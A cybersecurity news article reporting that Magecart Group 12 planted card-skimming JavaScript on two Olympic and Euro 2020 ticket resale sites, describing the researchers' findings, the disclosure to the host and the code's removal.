Threat Management

Magecart Group 12 named as actor behind Olympic ticket POS attack

The ticket reselling sites olympictickets2020.com and eurotickets2020.com reportedly have been compromised with Magecart POS skimming malware.

Magecart was first spotted on the two sites , which deal in tickets for the upcoming 2020 Tokyo Olympics EUFA Euro 2020, and were detailed In late January by researchers Jacob Pimental and Max Kersten and RiskIQ took the additional step attributing this attack to Magecart Group 12.

The obfuscation and skimming code we observed on opendoorcdn.com matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts. However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we’ll break down here,” RiskIQ wrote.

Group 12 employs base64 encoded checks against the URL looking for the word “checkout” to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL, RiskIQ said.

Kersten decided to look at the ticket sites based on a suspicion Pemental had when he “stumbled” across the issue. Kersten took a look at the site’s JavaScript file /dist/slippry.min.js and found a small description with the code where he found that an existing piece of JavaScript was abused to hide the malicious code.

“In this case, the library was hosted on the targeted site itself. There is no information as to how the malicious code got appended to the library,” Kersten wrote.

Both researchers contacted the site’s host company prior to going public and sent an email to its customer support firm. The company did take a look, but at first glance did not find the malware, Pemental then contacted them again with further details but received no response. Then on January 21 the pair saw that the malicious code was gone indicating the company had heeded their warning.

Anyone who purchased tickets through these two sites going back at least 50 days could be at risk and should check that their payment cards have not been compromised, suggested Pemental.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.